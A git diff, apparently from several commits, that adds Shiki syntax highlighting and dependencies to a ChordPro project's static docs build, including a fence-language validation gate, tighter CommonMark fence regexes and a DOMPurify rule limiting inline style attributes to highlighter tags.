+          "url": "https://github.com/sponsors/unifiedjs"
+        },
+        {
+          "type": "OpenCollective",
+          "url": "https://opencollective.com/unified"
+        }
+      ],
+      "license": "MIT"
+    },
+    "node_modules/micromark-util-types": {
+      "version": "2.0.2",
+      "resolved": "https://registry.npmjs.org/micromark-util-types/-/micromark-util-types-2.0.2.tgz",
+      "integrity": "sha512-Yw0ECSpJoViF1qTU4DC6NwtC4aWGt1EkzaQB8KPPyCRR8z9TWeV0HbEFGTO+ZY1wB22zmxnJqhPyTpOVCpeHTA==",
+      "dev": true,
+      "funding": [
+        {
+          "type": "GitHub Sponsors",
+          "url": "https://github.com/sponsors/unifiedjs"
+        },
+        {
+          "type": "OpenCollective",
+          "url": "https://opencollective.com/unified"
+        }
+      ],
+      "license": "MIT"
+    },
     "node_modules/mime-db": {
       "version": "1.52.0",
       "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz",
@@ -2762,6 +3138,25 @@
       },
       "funding": {
         "url": "https://github.com/sponsors/sindresorhus"
+      }
+    },
+    "node_modules/oniguruma-parser": {
+      "version": "0.12.2",
+      "resolved": "https://registry.npmjs.org/oniguruma-parser/-/oniguruma-parser-0.12.2.tgz",
+      "integrity": "sha512-6HVa5oIrgMC6aA6WF6XyyqbhRPJrKR02L20+2+zpDtO5QAzGHAUGw5TKQvwi5vctNnRHkJYmjAhRVQF2EKdTQw==",
+      "dev": true,
+      "license": "MIT"
+    },
+    "node_modules/oniguruma-to-es": {
+      "version": "4.3.6",
+      "resolved": "https://registry.npmjs.org/oniguruma-to-es/-/oniguruma-to-es-4.3.6.tgz",
+      "integrity": "sha512-csuQ9x3Yr0cEIs/Zgx/OEt9iBw9vqIunAPQkx19R/fiMq2oGVTgcMqO/V3Ybqefr1TBvosI6jU539ksaBULJyA==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "oniguruma-parser": "^0.12.2",
+        "regex": "^6.1.0",
+        "regex-recursion": "^6.0.2"
       }
     },
     "node_modules/ora": {
@@ -2934,6 +3329,17 @@
         "node": ">= 6"
       }
     },
+    "node_modules/property-information": {
+      "version": "7.1.0",
+      "resolved": "https://registry.npmjs.org/property-information/-/property-information-7.1.0.tgz",
+      "integrity": "sha512-TwEZ+X+yCJmYfL7TPUOcvBZ4QfoT5YenQiJuX//0th53DE6w0xxLEtfK3iyryQFddXuvkIk51EEgrJQ0WJkOmQ==",
+      "dev": true,
+      "license": "MIT",
+      "funding": {
+        "type": "github",
+        "url": "https://github.com/sponsors/wooorm"
+      }
+    },
     "node_modules/punycode": {
       "version": "2.3.1",
       "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz",
@@ -3002,6 +3408,33 @@
       "engines": {
         "node": ">=0.10.0"
       }
+    },
+    "node_modules/regex": {
+      "version": "6.1.0",
+      "resolved": "https://registry.npmjs.org/regex/-/regex-6.1.0.tgz",
+      "integrity": "sha512-6VwtthbV4o/7+OaAF9I5L5V3llLEsoPyq9P1JVXkedTP33c7MfCG0/5NOPcSJn0TzXcG9YUrR0gQSWioew3LDg==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "regex-utilities": "^2.3.0"
+      }
+    },
+    "node_modules/regex-recursion": {
+      "version": "6.0.2",
+      "resolved": "https://registry.npmjs.org/regex-recursion/-/regex-recursion-6.0.2.tgz",
+      "integrity": "sha512-0YCaSCq2VRIebiaUviZNs0cBz1kg5kVS2UKUfNIx8YVs1cN3AV7NTctO5FOKBA+UT2BPJIWZauYHPqJODG50cg==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "regex-utilities": "^2.3.0"
+      }
+    },
+    "node_modules/regex-utilities": {
+      "version": "2.3.0",
+      "resolved": "https://registry.npmjs.org/regex-utilities/-/regex-utilities-2.3.0.tgz",
+      "integrity": "sha512-8VhliFJAWRaUiVvREIiW2NXXTmHs4vMNnSzuJVhscgmGav3g9VDxLrQndI3dZZVVdp0ZO/5v0xmX516/7M9cng==",
+      "dev": true,
+      "license": "MIT"
     },
     "node_modules/restore-cursor": {
       "version": "5.1.0",
@@ -3112,6 +3545,26 @@
         "semver": "bin/semver.js"
       }
     },
+    "node_modules/shiki": {
+      "version": "4.1.0",
+      "resolved": "https://registry.npmjs.org/shiki/-/shiki-4.1.0.tgz",
+      "integrity": "sha512-l/ABZPUR5v70jI10EzqfMS/I96vjSGv2y0ihUV+WYFzv0EfvW4s54m0Lg8wCrrL+2IkwBzFTuxkZjPf8b2NX9Q==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@shikijs/core": "4.1.0",
+        "@shikijs/engine-javascript": "4.1.0",
+        "@shikijs/engine-oniguruma": "4.1.0",
+        "@shikijs/langs": "4.1.0",
+        "@shikijs/themes": "4.1.0",
+        "@shikijs/types": "4.1.0",
+        "@shikijs/vscode-textmate": "^10.0.2",
+        "@types/hast": "^3.0.4"
+      },
+      "engines": {
+        "node": ">=20"
+      }
+    },
     "node_modules/siginfo": {
       "version": "2.0.0",
       "resolved": "https://registry.npmjs.org/siginfo/-/siginfo-2.0.0.tgz",
@@ -3162,6 +3615,17 @@
         "node": ">=0.10.0"
       }
     },
+    "node_modules/space-separated-tokens": {
+      "version": "2.0.2",
+      "resolved": "https://registry.npmjs.org/space-separated-tokens/-/space-separated-tokens-2.0.2.tgz",
+      "integrity": "sha512-PEGlAwrG8yXGXRjW32fGbg66JAlOAwbObuqVoJpv/mRgoWDQfgH1wDPvtzWyUSNAXBGSk8h755YDbbcEy3SH2Q==",
+      "dev": true,
+      "license": "MIT",
+      "funding": {
+        "type": "github",
+        "url": "https://github.com/sponsors/wooorm"
+      }
+    },
     "node_modules/stackback": {
       "version": "0.0.2",
       "resolved": "https://registry.npmjs.org/stackback/-/stackback-0.0.2.tgz",
@@ -3204,6 +3668,21 @@
       },
       "funding": {
         "url": "https://github.com/sponsors/sindresorhus"
+      }
+    },
+    "node_modules/stringify-entities": {
+      "version": "4.0.4",
+      "resolved": "https://registry.npmjs.org/stringify-entities/-/stringify-entities-4.0.4.tgz",
+      "integrity": "sha512-IwfBptatlO+QCJUo19AqvrPNqlVMpW9YEL2LIVY+Rpv2qsjCGxaDLNRgeGsQWJhfItebuJhsGSLjaBbNSQ+ieg==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "character-entities-html4": "^2.0.0",
+        "character-entities-legacy": "^3.0.0"
+      },
+      "funding": {
+        "type": "github",
+        "url": "https://github.com/sponsors/wooorm"
       }
     },
     "node_modules/strip-ansi": {
@@ -3343,6 +3822,17 @@
         "node": ">=18"
       }
     },
+    "node_modules/trim-lines": {
+      "version": "3.0.1",
+      "resolved": "https://registry.npmjs.org/trim-lines/-/trim-lines-3.0.1.tgz",
+      "integrity": "sha512-kRj8B+YHZCc9kQYdWfJB2/oUl9rA99qbowYYBtr4ui4mZyAQ2JpvVBd/6U2YloATfqBhBTSMhTpgBHtU0Mf3Rg==",
+      "dev": true,
+      "license": "MIT",
+      "funding": {
+        "type": "github",
+        "url": "https://github.com/sponsors/wooorm"
+      }
+    },
     "node_modules/typescript": {
       "version": "5.9.3",
       "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.9.3.tgz",
@@ -3363,6 +3853,79 @@
       "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==",
       "dev": true,
       "license": "MIT"
+    },
+    "node_modules/unist-util-is": {
+      "version": "6.0.1",
+      "resolved": "https://registry.npmjs.org/unist-util-is/-/unist-util-is-6.0.1.tgz",
+      "integrity": "sha512-LsiILbtBETkDz8I9p1dQ0uyRUWuaQzd/cuEeS1hoRSyW5E5XGmTzlwY1OrNzzakGowI9Dr/I8HVaw4hTtnxy8g==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@types/unist": "^3.0.0"
+      },
+      "funding": {
+        "type": "opencollective",
+        "url": "https://opencollective.com/unified"
+      }
+    },
+    "node_modules/unist-util-position": {
+      "version": "5.0.0",
+      "resolved": "https://registry.npmjs.org/unist-util-position/-/unist-util-position-5.0.0.tgz",
+      "integrity": "sha512-fucsC7HjXvkB5R3kTCO7kUjRdrS0BJt3M/FPxmHMBOm8JQi2BsHAHFsy27E0EolP8rp0NzXsJ+jNPyDWvOJZPA==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@types/unist": "^3.0.0"
+      },
+      "funding": {
+        "type": "opencollective",
+        "url": "https://opencollective.com/unified"
+      }
+    },
+    "node_modules/unist-util-stringify-position": {
+      "version": "4.0.0",
+      "resolved": "https://registry.npmjs.org/unist-util-stringify-position/-/unist-util-stringify-position-4.0.0.tgz",
+      "integrity": "sha512-0ASV06AAoKCDkS2+xw5RXJywruurpbC4JZSm7nr7MOt1ojAzvyyaO+UxZf18j8FCF6kmzCZKcAgN/yu2gm2XgQ==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@types/unist": "^3.0.0"
+      },
+      "funding": {
+        "type": "opencollective",
+        "url": "https://opencollective.com/unified"
+      }
+    },
+    "node_modules/unist-util-visit": {
+      "version": "5.1.0",
+      "resolved": "https://registry.npmjs.org/unist-util-visit/-/unist-util-visit-5.1.0.tgz",
+      "integrity": "sha512-m+vIdyeCOpdr/QeQCu2EzxX/ohgS8KbnPDgFni4dQsfSCtpz8UqDyY5GjRru8PDKuYn7Fq19j1CQ+nJSsGKOzg==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@types/unist": "^3.0.0",
+        "unist-util-is": "^6.0.0",
+        "unist-util-visit-parents": "^6.0.0"
+      },
+      "funding": {
+        "type": "opencollective",
+        "url": "https://opencollective.com/unified"
+      }
+    },
+    "node_modules/unist-util-visit-parents": {
+      "version": "6.0.2",
+      "resolved": "https://registry.npmjs.org/unist-util-visit-parents/-/unist-util-visit-parents-6.0.2.tgz",
+      "integrity": "sha512-goh1s1TBrqSqukSc8wrjwWhL0hiJxgA8m4kFxGlQ+8FYQ3C/m11FcTs4YYem7V664AhHVvgoQLk890Ssdsr2IQ==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@types/unist": "^3.0.0",
+        "unist-util-is": "^6.0.0"
+      },
+      "funding": {
+        "type": "opencollective",
+        "url": "https://opencollective.com/unified"
+      }
     },
     "node_modules/update-browserslist-db": {
       "version": "1.2.3",
@@ -3393,6 +3956,36 @@
       },
       "peerDependencies": {
         "browserslist": ">= 4.21.0"
+      }
+    },
+    "node_modules/vfile": {
+      "version": "6.0.3",
+      "resolved": "https://registry.npmjs.org/vfile/-/vfile-6.0.3.tgz",
+      "integrity": "sha512-KzIbH/9tXat2u30jf+smMwFCsno4wHVdNmzFyL+T/L3UGqqk6JKfVqOFOZEpZSHADH1k40ab6NUIXZq422ov3Q==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@types/unist": "^3.0.0",
+        "vfile-message": "^4.0.0"
+      },
+      "funding": {
+        "type": "opencollective",
+        "url": "https://opencollective.com/unified"
+      }
+    },
+    "node_modules/vfile-message": {
+      "version": "4.0.3",
+      "resolved": "https://registry.npmjs.org/vfile-message/-/vfile-message-4.0.3.tgz",
+      "integrity": "sha512-QTHzsGd1EhbZs4AsQ20JX1rC3cOlt/IWJruk893DfLRr57lcnOeMaWG4K0JrRta4mIJZKth2Au3mM3u03/JWKw==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@types/unist": "^3.0.0",
+        "unist-util-stringify-position": "^4.0.0"
+      },
+      "funding": {
+        "type": "opencollective",
+        "url": "https://opencollective.com/unified"
       }
     },
     "node_modules/vite": {
@@ -4708,6 +5301,17 @@
       },
       "funding": {
         "url": "https://github.com/sponsors/sindresorhus"
+      }
+    },
+    "node_modules/zwitch": {
+      "version": "2.0.4",
+      "resolved": "https://registry.npmjs.org/zwitch/-/zwitch-2.0.4.tgz",
+      "integrity": "sha512-bXE4cR/kVZhKZX/RjPEflHaKVhUVl85noU3v6b8apfQEc1x4A+zBxjZ4lN8LqGd6WZ3dl98pY4o717VFmoPp+A==",
+      "dev": true,
+      "license": "MIT",
+      "funding": {
+        "type": "github",
+        "url": "https://github.com/sponsors/wooorm"
       }
     }
   }

--- a/packages/playground/package.json
+++ b/packages/playground/package.json
@@ -32,6 +32,7 @@
     "react": "^18.3.1",
     "react-dom": "^18.3.1",
     "react-grab": "^0.1.33",
+    "shiki": "^4.1.0",
     "typescript": "^5.7.0",
     "vite": "^6.0.0",
     "vitest": "^2.1.8"

--- a/packages/playground/scripts/build-docs-static.d.mts
+++ b/packages/playground/scripts/build-docs-static.d.mts
@@ -10,6 +10,12 @@ export function pageHtml(args: {
   cssHref: string;
 }): string;
 
+/** Returns every fence-header lang found in the supplied markdown
+ *  source string. Exposed for unit tests that need to exercise the
+ *  fence regex against synthetic inputs (~~~ fences, indented
+ *  fences, closing-fence-followed-by-prose). */
+export function parseFenceHeaders(source: string): string[];
+
 /** Map of `lang` → list of `sourcePath`s that opened a fence with
  *  that header. Used by `assertEveryFenceLangIsLoaded` and exported
  *  for tests. */

--- a/packages/playground/scripts/build-docs-static.d.mts
+++ b/packages/playground/scripts/build-docs-static.d.mts
@@ -9,3 +9,13 @@ export function pageHtml(args: {
   outline: OutlineEntry[];
   cssHref: string;
 }): string;
+
+/** Map of `lang` → list of `sourcePath`s that opened a fence with
+ *  that header. Used by `assertEveryFenceLangIsLoaded` and exported
+ *  for tests. */
+export function collectFenceLangs(): Map<string, string[]>;
+
+/** Throws when any fence header in the docs corpus does not
+ *  resolve through `resolveShikiLang`. Called from `main` so the
+ *  build aborts before any HTML is written. */
+export function assertEveryFenceLangIsLoaded(): Map<string, string[]>;

--- a/packages/playground/scripts/build-docs-static.d.mts
+++ b/packages/playground/scripts/build-docs-static.d.mts
@@ -15,6 +15,12 @@ export function pageHtml(args: {
  *  for tests. */
 export function collectFenceLangs(): Map<string, string[]>;
 
+/** Throws when the supplied `lang → sourcePath[]` map contains a
+ *  fence header that does not resolve through `resolveShikiLang`.
+ *  Split out from `assertEveryFenceLangIsLoaded` so unit tests can
+ *  exercise the negative branch on a synthetic map. */
+export function validateFenceLangs(usages: Map<string, string[]>): void;
+
 /** Throws when any fence header in the docs corpus does not
  *  resolve through `resolveShikiLang`. Called from `main` so the
  *  build aborts before any HTML is written. */

--- a/packages/playground/scripts/build-docs-static.mjs
+++ b/packages/playground/scripts/build-docs-static.mjs
@@ -17,6 +17,7 @@ import {
   cleanUrlFor,
   extractOutline,
   renderMarkdown,
+  resolveShikiLang,
 } from './lib/docs-render.mjs';
 
 const here = dirname(fileURLToPath(import.meta.url));
@@ -187,10 +188,68 @@ function renderOnePage({ page, cssHref }) {
   return outFile;
 }
 
+// Match ` ```<lang> ` and ` ```<lang> {meta...} ` opening fences,
+// ignoring closing fences and indented fences.
+const FENCE_OPEN_RE = /^```([A-Za-z0-9_+\-]+)/gm;
+
+/**
+ * Walk every registered docs page, collect every fence-header lang,
+ * and assert each one resolves through `resolveShikiLang`. The point
+ * is to turn "silent fallback to plain `<pre><code>`" — which clears
+ * unit tests and produces a green build but ships un-highlighted
+ * blocks — into a loud build failure. New `.md` files or new fence
+ * langs must extend `SHIKI_LANGS` / `SHIKI_LANG_ALIASES` in the same
+ * commit.
+ */
+export function collectFenceLangs() {
+  const usages = new Map(); // lang → [sourcePath, ...]
+  for (const group of DOC_GROUPS) {
+    for (const page of group.pages) {
+      const sourceFile = resolve(REPO_ROOT, page.sourcePath);
+      const source = readFileSync(sourceFile, 'utf8');
+      for (const match of source.matchAll(FENCE_OPEN_RE)) {
+        const lang = match[1];
+        const list = usages.get(lang) ?? [];
+        if (!list.includes(page.sourcePath)) list.push(page.sourcePath);
+        usages.set(lang, list);
+      }
+    }
+  }
+  return usages;
+}
+
+export function assertEveryFenceLangIsLoaded() {
+  const usages = collectFenceLangs();
+  const missing = [];
+  for (const [lang, sources] of usages) {
+    if (resolveShikiLang(lang) === null) {
+      missing.push({ lang, sources });
+    }
+  }
+  if (missing.length > 0) {
+    const lines = missing
+      .map(
+        ({ lang, sources }) =>
+          `  - \`\`\`${lang}\`\`\` used in: ${sources.join(', ')}`,
+      )
+      .join('\n');
+    throw new Error(
+      `build-docs-static: ${missing.length} fence language(s) used in ` +
+        `docs/sdk/ are not loaded by Shiki:\n${lines}\n\n` +
+        `Add the lang to SHIKI_LANGS (or to SHIKI_LANG_ALIASES with a ` +
+        `loaded target) in packages/playground/scripts/lib/docs-render.mjs.`,
+    );
+  }
+  return usages;
+}
+
 function main() {
   if (!existsSync(DIST_DIR)) {
     throw new Error(`Missing ${DIST_DIR}; run \`vite build\` first.`);
   }
+  // Fail-fast: if any docs page introduces a fence header Shiki
+  // doesn't know about, the build aborts before we write any HTML.
+  assertEveryFenceLangIsLoaded();
   const cssHref = findCssAssetUrl();
   let written = 0;
   for (const group of DOC_GROUPS) {

--- a/packages/playground/scripts/build-docs-static.mjs
+++ b/packages/playground/scripts/build-docs-static.mjs
@@ -188,18 +188,23 @@ function renderOnePage({ page, cssHref }) {
   return outFile;
 }
 
-// Match ` ```<lang> ` and ` ```<lang> {meta...} ` opening fences,
-// ignoring closing fences and indented fences.
-const FENCE_OPEN_RE = /^```([A-Za-z0-9_+\-]+)/gm;
+// CommonMark fence opening: 0–3 leading spaces, then a run of 3+
+// backticks OR 3+ tildes, then an optional info-string starting
+// with the lang. Horizontal whitespace (`[ \t]*`) between the fence
+// chars and the lang is allowed — but NOT newlines, otherwise a
+// closing fence followed by prose like ` ```\n\nReturns a song. `
+// would consume the newlines via `\s*` and match `Returns` as a
+// fence lang. Closing fences (no info string) are excluded by the
+// `([A-Za-z0-9_+\-]+)` capture requiring at least one identifier
+// character. The `m` flag anchors `^` at line start; the
+// character-class `+` is linear in input length (no ReDoS surface).
+const FENCE_OPEN_RE =
+  /^ {0,3}(?:`{3,}|~{3,})[ \t]*([A-Za-z0-9_+\-]+)/gm;
 
 /**
  * Walk every registered docs page, collect every fence-header lang,
- * and assert each one resolves through `resolveShikiLang`. The point
- * is to turn "silent fallback to plain `<pre><code>`" — which clears
- * unit tests and produces a green build but ships un-highlighted
- * blocks — into a loud build failure. New `.md` files or new fence
- * langs must extend `SHIKI_LANGS` / `SHIKI_LANG_ALIASES` in the same
- * commit.
+ * and return a `lang → sourcePath[]` map. Both backtick and tilde
+ * fences are matched per CommonMark §4.5 (Fenced code blocks).
  */
 export function collectFenceLangs() {
   const usages = new Map(); // lang → [sourcePath, ...]
@@ -218,8 +223,15 @@ export function collectFenceLangs() {
   return usages;
 }
 
-export function assertEveryFenceLangIsLoaded() {
-  const usages = collectFenceLangs();
+/**
+ * Throws when the supplied `lang → sourcePath[]` map contains any
+ * fence header that does not resolve through `resolveShikiLang`.
+ * Split out from `assertEveryFenceLangIsLoaded` so unit tests can
+ * exercise the negative branch (mutation E in the round-1 review:
+ * collapsing the predicate to `if (false)` had no failing test on
+ * the live corpus).
+ */
+export function validateFenceLangs(usages) {
   const missing = [];
   for (const [lang, sources] of usages) {
     if (resolveShikiLang(lang) === null) {
@@ -240,6 +252,17 @@ export function assertEveryFenceLangIsLoaded() {
         `loaded target) in packages/playground/scripts/lib/docs-render.mjs.`,
     );
   }
+}
+
+/**
+ * Build-time gate: scan every page, then validate every collected
+ * fence lang. Called from `main` so the build aborts before any
+ * HTML is written. Turns "silent fallback to plain `<pre><code>`"
+ * into a loud build failure.
+ */
+export function assertEveryFenceLangIsLoaded() {
+  const usages = collectFenceLangs();
+  validateFenceLangs(usages);
   return usages;
 }
 

--- a/packages/playground/scripts/build-docs-static.mjs
+++ b/packages/playground/scripts/build-docs-static.mjs
@@ -206,14 +206,28 @@ const FENCE_OPEN_RE =
  * and return a `lang → sourcePath[]` map. Both backtick and tilde
  * fences are matched per CommonMark §4.5 (Fenced code blocks).
  */
+/**
+ * Pure helper: returns every fence-header lang found in the supplied
+ * markdown source string. Exposed for unit tests that need to
+ * exercise FENCE_OPEN_RE against synthetic inputs (`~~~lang`,
+ * indented fences, closing-fence-followed-by-prose) without
+ * touching the disk-bound corpus walker.
+ */
+export function parseFenceHeaders(source) {
+  const out = [];
+  for (const match of source.matchAll(FENCE_OPEN_RE)) {
+    out.push(match[1]);
+  }
+  return out;
+}
+
 export function collectFenceLangs() {
   const usages = new Map(); // lang → [sourcePath, ...]
   for (const group of DOC_GROUPS) {
     for (const page of group.pages) {
       const sourceFile = resolve(REPO_ROOT, page.sourcePath);
       const source = readFileSync(sourceFile, 'utf8');
-      for (const match of source.matchAll(FENCE_OPEN_RE)) {
-        const lang = match[1];
+      for (const lang of parseFenceHeaders(source)) {
         const list = usages.get(lang) ?? [];
         if (!list.includes(page.sourcePath)) list.push(page.sourcePath);
         usages.set(lang, list);
@@ -227,9 +241,9 @@ export function collectFenceLangs() {
  * Throws when the supplied `lang → sourcePath[]` map contains any
  * fence header that does not resolve through `resolveShikiLang`.
  * Split out from `assertEveryFenceLangIsLoaded` so unit tests can
- * exercise the negative branch (mutation E in the round-1 review:
- * collapsing the predicate to `if (false)` had no failing test on
- * the live corpus).
+ * inject a synthetic map and exercise the negative branch
+ * directly — the integrated function passes on the live corpus by
+ * design, so the predicate itself would otherwise be untested.
  */
 export function validateFenceLangs(usages) {
   const missing = [];

--- a/packages/playground/scripts/lib/docs-render.d.mts
+++ b/packages/playground/scripts/lib/docs-render.d.mts
@@ -40,3 +40,4 @@ export function renderMarkdown(source: string, sourcePath?: string): string;
 export function extractOutline(source: string): OutlineEntry[];
 
 export function highlightCodeBlock(code: string, lang: string): string;
+export function resolveShikiLang(lang: string): string | null;

--- a/packages/playground/scripts/lib/docs-render.d.mts
+++ b/packages/playground/scripts/lib/docs-render.d.mts
@@ -38,3 +38,5 @@ export function rewriteHref(href: string, sourceDir: string): string;
 
 export function renderMarkdown(source: string, sourcePath?: string): string;
 export function extractOutline(source: string): OutlineEntry[];
+
+export function highlightCodeBlock(code: string, lang: string): string;

--- a/packages/playground/scripts/lib/docs-render.mjs
+++ b/packages/playground/scripts/lib/docs-render.mjs
@@ -4,9 +4,14 @@
 // `.claude/rules/sanitizer-security.md` + `.claude/rules/fix-propagation.md`.
 // Any addition or removal MUST land in all three sites in the same PR.
 
+import { readFileSync } from 'node:fs';
+import { dirname, resolve } from 'node:path';
+import { fileURLToPath } from 'node:url';
+
 import { Marked } from 'marked';
 import { JSDOM } from 'jsdom';
 import createDOMPurify from 'dompurify';
+import { createHighlighter } from 'shiki';
 
 const SITE_BASE = '/chordsketch/';
 export const DOCS_BASE = `${SITE_BASE}docs/`;
@@ -414,12 +419,115 @@ DOMPurify.addHook('afterSanitizeAttributes', (node) => {
     node.setAttribute('target', '_blank');
     node.setAttribute('rel', 'noreferrer noopener');
   }
+  // `style` is enabled in PURIFY_CONFIG.ADD_ATTR only to let Shiki's
+  // per-token `<span style="color:...">` survive. DOMPurify's CSS
+  // sanitiser already strips URLs / expressions / behaviour, but
+  // restrict the attribute to the three tags Shiki emits so an
+  // unrelated `<div style="...">` in a future markdown file cannot
+  // ride the same allowlist.
+  const styleAttr = node.getAttribute('style');
+  if (styleAttr !== null && !SHIKI_STYLE_TAGS.has(node.tagName)) {
+    node.removeAttribute('style');
+  }
 });
+
+const SHIKI_STYLE_TAGS = new Set(['PRE', 'CODE', 'SPAN']);
 
 const PURIFY_CONFIG = {
   USE_PROFILES: { html: true },
-  ADD_ATTR: ['id'],
+  ADD_ATTR: ['id', 'style'],
 };
+
+// Shiki highlighter. Build-time only (the deployed pages carry zero
+// JS beyond the inline hash-redirect shim per ADR-0021); the
+// highlighter object is reused across every page render so we pay
+// grammar / theme load cost once. The ChordPro grammar is sister-site
+// to `syntaxes/chordpro.tmLanguage.json` — the same TextMate grammar
+// VS Code, Zed, and the JetBrains plugin ship for editor
+// highlighting, so on-page docs colour matches what readers see in
+// their editor.
+const HERE = dirname(fileURLToPath(import.meta.url));
+const REPO_ROOT = resolve(HERE, '../../../..');
+const CHORDPRO_GRAMMAR = JSON.parse(
+  readFileSync(
+    resolve(REPO_ROOT, 'syntaxes/chordpro.tmLanguage.json'),
+    'utf8',
+  ),
+);
+// Match the corpus surveyed under `docs/sdk/` (` ``` ` fences) plus
+// the obvious near-aliases. New languages used in markdown MUST be
+// added here or the renderer falls back to plain `<pre><code>`.
+const SHIKI_LANGS = [
+  'bash',
+  'json',
+  'kotlin',
+  'python',
+  'ruby',
+  'rust',
+  'shell',
+  'swift',
+  'tsx',
+  'typescript',
+  { ...CHORDPRO_GRAMMAR, name: 'chordpro' },
+];
+const SHIKI_THEME = 'github-dark';
+const HIGHLIGHTER = await createHighlighter({
+  themes: [SHIKI_THEME],
+  langs: SHIKI_LANGS,
+});
+// `ts` is an alias for `typescript` in docs fences; Shiki's
+// bundled-languages alias map covers it for the dynamic loader but
+// not for a preloaded highlighter, so resolve aliases up-front.
+const SHIKI_LANG_ALIASES = new Map([
+  ['ts', 'typescript'],
+  ['js', 'javascript'],
+  ['sh', 'bash'],
+  ['shellscript', 'bash'],
+]);
+const SHIKI_LOADED_LANGS = new Set(HIGHLIGHTER.getLoadedLanguages());
+
+// Strip Shiki's wrapper-level inline `style` / `tabindex` so the
+// existing `.docs-prose pre` rule keeps controlling background,
+// padding, and border radius. Per-token `<span>` colours stay.
+const stripPreWrapper = {
+  pre(node) {
+    if (node.properties) {
+      delete node.properties.style;
+      delete node.properties.tabindex;
+    }
+  },
+};
+
+function resolveShikiLang(lang) {
+  if (!lang) return null;
+  const lower = lang.toLowerCase();
+  const aliased = SHIKI_LANG_ALIASES.get(lower) ?? lower;
+  return SHIKI_LOADED_LANGS.has(aliased) ? aliased : null;
+}
+
+function escapeHtmlText(value) {
+  return value
+    .replace(/&/g, '&amp;')
+    .replace(/</g, '&lt;')
+    .replace(/>/g, '&gt;')
+    .replace(/"/g, '&quot;')
+    .replace(/'/g, '&#39;');
+}
+
+/** Build-time syntax highlight for a Markdown code fence. Falls back
+ *  to plain `<pre><code>` when the language is unknown so a
+ *  mis-tagged fence still renders. */
+export function highlightCodeBlock(code, lang) {
+  const resolved = resolveShikiLang(lang);
+  if (resolved === null) {
+    return `<pre><code>${escapeHtmlText(code)}</code></pre>`;
+  }
+  return HIGHLIGHTER.codeToHtml(code, {
+    lang: resolved,
+    theme: SHIKI_THEME,
+    transformers: [stripPreWrapper],
+  });
+}
 
 /** Parse Markdown to sanitised HTML; `sourcePath` may be empty for
  *  ad-hoc inputs (no relative-link rewriting then). */
@@ -442,6 +550,9 @@ export function renderMarkdown(source, sourcePath = '') {
           ? ` title="${escapeAttribute(token.title)}"`
           : '';
         return `<a href="${escapeAttribute(href)}"${titleAttr}>${innerHtml}</a>`;
+      },
+      code(token) {
+        return highlightCodeBlock(token.text, token.lang ?? '');
       },
     },
   });

--- a/packages/playground/scripts/lib/docs-render.mjs
+++ b/packages/playground/scripts/lib/docs-render.mjs
@@ -668,14 +668,15 @@ function escapeHtmlText(value) {
     .replace(/'/g, '&#39;');
 }
 
-// Build-time-only function; the docs corpus's longest fence
-// (measured at 743 bytes by walking every fence under `docs/sdk/`
-// — see ADR-0025 §"Decision" + §"Consequences") sits well under
-// this ceiling. The cap turns a runaway input (a machine-generated
-// doc file, a mis-rendered binary embedded in a fence) into a
-// build error instead of an OOM or pathological highlight run.
-// `chordsketch-chordpro` enforces analogous caps per
-// `.claude/rules/code-style.md` §"Resource Limits".
+// Build-time-only function; the docs corpus's longest fence body
+// (an ASCII architecture diagram in `docs/sdk/README.md`, measured
+// at 1395 bytes by walking every fence under `docs/sdk/` — see
+// ADR-0025 §"Decision" + §"Consequences") sits well under this
+// ceiling. Note: that fence carries no info-string lang, so it
+// reaches Shiki via the fallback path. The cap turns a runaway
+// input (a machine-generated doc file, a mis-rendered binary
+// embedded in a fence) into a build error instead of an OOM or
+// pathological highlight run.
 const MAX_CODE_BLOCK_BYTES = 256 * 1024;
 
 /**
@@ -759,15 +760,19 @@ export function renderMarkdown(source, sourcePath = '') {
 // on-page outline with a broken anchor (the heading does not reach
 // the rendered HTML, so the link 404-scrolls).
 //
-// CommonMark requires the closing fence to use the same character
-// (backtick or tilde) as the opening fence. Two regexes — one per
-// character — cleanly express that without backreference acrobatics.
-// Both opening and closing fences allow 0–3 leading spaces and a
-// trailing run of spaces/tabs (but not newlines).
+// CommonMark §4.5 requires the closing fence to (a) use the same
+// character (backtick or tilde) as the opening fence and (b) be at
+// least as long. Two regexes — one per character — express (a)
+// without backreference acrobatics across characters; within each
+// regex a backreference to the opening-run capture plus `\1*`
+// expresses (b) — the closing run is at least the opening length
+// plus zero-or-more additional fence chars. Both opening and
+// closing fences allow 0–3 leading spaces and a trailing run of
+// spaces/tabs (but not newlines).
 const BACKTICK_FENCE_RE =
-  /^ {0,3}`{3,}[\s\S]*?^ {0,3}`{3,}[^\S\n]*$/gm;
+  /^ {0,3}(`{3,})[\s\S]*?^ {0,3}\1`*[^\S\n]*$/gm;
 const TILDE_FENCE_RE =
-  /^ {0,3}~{3,}[\s\S]*?^ {0,3}~{3,}[^\S\n]*$/gm;
+  /^ {0,3}(~{3,})[\s\S]*?^ {0,3}\1~*[^\S\n]*$/gm;
 const HEADING_RE = /^(#+)\s+(.+)$/gm;
 export function extractOutline(source) {
   let stripped = source.replace(BACKTICK_FENCE_RE, (block) =>

--- a/packages/playground/scripts/lib/docs-render.mjs
+++ b/packages/playground/scripts/lib/docs-render.mjs
@@ -212,6 +212,15 @@ const DANGEROUS_URI_SCHEMES = [
 ];
 
 function isInvisibleFormatChar(code) {
+  // Covers (a) the canonical BIDI / format-control set that CSPP /
+  // CVE-2021-42574 (Trojan Source) recognises plus (b) Unicode
